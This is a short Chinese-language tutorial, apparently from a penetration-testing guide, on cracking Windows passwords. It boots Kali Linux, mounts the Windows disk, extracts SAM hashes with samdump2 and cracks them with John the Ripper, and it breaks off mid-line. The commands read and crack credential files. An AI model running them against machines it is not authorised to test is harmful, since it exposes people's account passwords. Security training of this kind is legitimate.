使用 John the Ripper 破解 Windows 密码
操作步骤让我们开始使用 John the Ripper 破解 Windows SAM 文件。我们假设你能够访问某台Windows 主机,通过远程入侵,或者物理接触,并且能够通过 USB 或 DVD 驱动器启动 KaliLinux。
1. 看看你想挂载哪个硬盘:
Fdisk -l
2. 挂载该硬盘,并将target设为它的挂载点。
mount /dev/sda1 /target/
3. 将目录改为 Windows SAM 文件的位置:
cd /target/windows/system32/config
4. 列出目录中所有内容。
ls –al
5. 使用 SamDump2 来提取哈希,并将文件放到你的 root 用户目录中的一个叫做hashes的文件夹中。
samdump2 system SAM > /root/hashes/hash.txt
6. 将目录改为 John the Ripper 所在目录。
7. 运行 John the Ripper:
./john /root/hashes/hash.txt
./john /root/hashes/hash.txt–f:nt (If attacking a file on a NTFS Syste